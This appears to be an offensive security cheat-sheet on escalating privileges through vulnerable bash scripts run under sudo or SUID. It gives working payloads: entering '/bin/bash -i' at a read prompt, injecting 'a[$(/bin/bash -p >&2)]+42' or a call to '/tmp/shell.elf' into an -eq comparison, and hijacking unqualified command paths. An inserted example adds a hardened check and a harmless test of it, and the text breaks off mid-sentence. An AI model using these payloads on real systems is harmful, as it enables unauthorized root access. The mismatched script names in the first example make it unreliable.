Bash scripting is a powerful tool used by system administrators and developers to automate tasks and streamline processes on Unix-like systems. However, like any software, bash scripts can be vulnerable to various security issues, which, if exploited, can lead to privilege escalation and unauthorized access.
Practice
Shell In Prompt
If a bash script executes read -p, we can input /bin/bash -i to get a shell as another user.
$ cat /usr/bin/vuln-script.sh
#!/bin/bash
read -p "What's you name: "
We can input /bin/bash -i to get a shell.
$ sudo /usr/bin/sudo-script.sh
What's you name: /bin/bash -i
Bash eq
If a bash script uses the -eq comparison on user input, it's vulnerable to arbitrary command execution.
$ cat /usr/bin/vuln-script.sh
#!/bin/bash
read -rp "Enter guess: " num
if [[ $num -eq 42 ]]
then
echo "Correct"
else
echo "Wrong"
fi
To execute an arbitrary command, answer the question as shown below. We have to inject the arbitrary command before the correct number (42).
sudo /bin/bash /opt/example.sh
Enter guess: a[$(/bin/bash -p >&2)]+42
#Or execute your own malicious script
sudo /bin/bash /opt/example.sh
Enter guess: a[$(/tmp/shell.elf)]+42
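Bash evaluates the operands of -eq inside [[ ]] as arithmetic expressions. To evaluate the array element a[$(/tmp/shell.elf)] it first expands the subscript, which runs the command substitution and so executes our script.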
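An added example (not from the original page) that puts the page's -eq check beside a validated version and uses a harmless touch to show whether the injected subscript gets evaluated. The names check_safe and probe and the marker payload are constructed for illustration.

```bash
#!/bin/bash
# Added example. check_unsafe reproduces the page's pattern; check_safe and
# probe are hypothetical names, and the payload below is constructed.

# Pattern from the page: [[ ... -eq ... ]] evaluates $num as an arithmetic
# expression, so a subscript like a[$(cmd)] runs cmd.
check_unsafe() {
    local num=$1
    [[ $num -eq 42 ]]
}

# Hardened form: allow only a canonical decimal integer (no leading zeros,
# at most 18 digits so it cannot overflow) before any arithmetic comparison.
# Returns 0 = correct, 1 = wrong, 2 = rejected input.
check_safe() {
    local num=$1 re='^(0|-?[1-9][0-9]{0,17})$'
    [[ $num =~ $re ]] || return 2
    [[ $num -eq 42 ]]
}

# Feed a checker the page's payload shape with a harmless `touch` inside,
# then report whether the embedded command ran.
probe() {
    local checker=$1 marker result=inert
    marker=$(mktemp -u)          # unused temp path; the file must not exist yet
    "$checker" "a[\$(touch $marker)]+42" 2>/dev/null || true
    if [[ -e $marker ]]; then result=executed; fi
    rm -f "$marker"
    echo "$result"
}

printf 'check_unsafe: %s\n' "$(probe check_unsafe)"
printf 'check_safe:   %s\n' "$(probe check_safe)"
```

Quoting "$num" inside [[ ]] does not prevent this, because the arithmetic evaluation happens after the variable is expanded; the value has to be validated before it reaches -eq.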
No Command Path Exploit
If a bash script executes another command without specifying its full path, we can abuse it to get a privilege escalation.
$ cat /usr/bin/vuln-suid-script.sh
#!/bin/bash
ls /root/var/file
We can create a malicious file in the /tmp folder with the same name as the command that is called without its full path